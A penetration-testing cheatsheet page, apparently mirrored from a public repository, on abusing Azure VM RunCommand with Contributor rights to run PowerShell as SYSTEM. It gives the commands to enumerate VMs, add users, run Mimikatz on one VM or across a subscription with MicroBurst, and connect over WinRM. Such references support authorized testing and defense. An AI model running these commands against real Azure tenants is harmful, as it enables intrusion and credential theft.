daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-services-virtual-machine.md (2394B)


      1 ---
      2 title: "Azure Services - Virtual Machine"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-services-virtual-machine.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-services-virtual-machine.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure Services - Virtual Machine
     12 
     13 ## RunCommand
     14 
     15 > Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System`
     16 
     17 **Requirements**: `Microsoft.Compute/virtualMachines/runCommand/action`
     18 
     19 * List available Virtual Machines
     20 
     21     ```powershell
     22     PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
     23     ResourceGroupName    Name       
     24     -----------------    ----       
     25     TESTRESOURCES        Remote-Test
     26     ```
     27 
     28 * Get Public IP of VM by querying the network interface
     29 
     30     ```powershell
     31     PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
     32     PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
     33     PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
     34     ```
     35 
     36 * Execute Powershell script on the VM, like `adduser`
     37 
     38     ```ps1
     39     PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
     40     PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
     41     ```
     42 
     43 * Finally you should be able to connect via WinRM
     44 
     45     ```ps1
     46     $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
     47     $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
     48     $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
     49     Enter-PSSession $sess
     50     ```
     51 
     52 Against the whole subscription using `MicroBurst.ps1`
     53 
     54 ```powershell
     55 Import-module MicroBurst.psm1
     56 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
     57 ```
     58 
     59 ## References
     60 
     61 * [Running Powershell scripts on Azure VM - Karl Fosaaen - November 6, 2018](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
     62 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)